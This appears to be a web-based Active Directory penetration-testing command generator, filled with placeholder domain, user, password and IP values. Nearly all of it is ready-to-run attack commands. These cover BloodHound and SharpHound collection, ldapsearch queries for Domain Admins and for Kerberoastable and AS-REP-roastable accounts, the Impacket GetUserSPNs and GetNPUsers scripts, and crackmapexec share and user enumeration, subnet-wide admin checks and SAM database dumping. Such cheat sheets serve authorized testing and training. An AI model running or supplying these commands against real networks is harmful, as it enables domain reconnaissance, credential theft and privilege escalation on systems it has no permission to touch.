$loading...
Enter your target AD environment details to generate customized attack commands for authorized penetration testing.
# SharpHound (from Windows domain-joined or with creds): .\SharpHound.exe -c All --domain corp.local --ldapusername jsmith --ldappassword Password123! # BloodHound.py (from Linux with creds): python3 bloodhound.py -d corp.local -u jsmith -p 'Password123!' -ns 10.10.10.100 -c All bloodhound-python -d corp.local -u jsmith -p 'Password123!' --dc 10.10.10.100 -c all --zip # Enum4linux-ng (general AD enumeration): enum4linux-ng -A -u jsmith -p 'Password123!' 10.10.10.100 # ldapdomaindump: python3 ldapdomaindump.py -u 'corp.local\jsmith' -p 'Password123!' 10.10.10.100
# List domain users: ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName # Find Domain Admins: ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(memberOf=CN=Domain Admins,CN=Users,DC=corp,DC=local)" sAMAccountName # Find SPNs (Kerberoastable accounts): ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName # Find accounts with pre-auth disabled (AS-REP Roastable): ldapsearch -x -H ldap://10.10.10.100 -D "[email protected]" -w 'Password123!' -b "DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
# GetADUsers.py — list all domain users: python3 GetADUsers.py -all corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100 # GetUserSPNs.py — find Kerberoastable accounts: python3 GetUserSPNs.py corp.local/jsmith:'Password123!' -dc-ip 10.10.10.100 # GetNPUsers.py — find AS-REP Roastable accounts: python3 GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.100 -no-pass # rpcdump.py — enumerate RPC services: python3 rpcdump.py -port 135 10.10.10.100
# Enumerate shares: crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --shares # Enumerate users: crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --users # Check for local admin access on subnet: crackmapexec smb 10.10.10.0/24 -u jsmith -p 'Password123!' # Dump SAM database (if local admin): crackmapexec smb 10.10.10.100 -u jsmith -p 'Password123!' --sam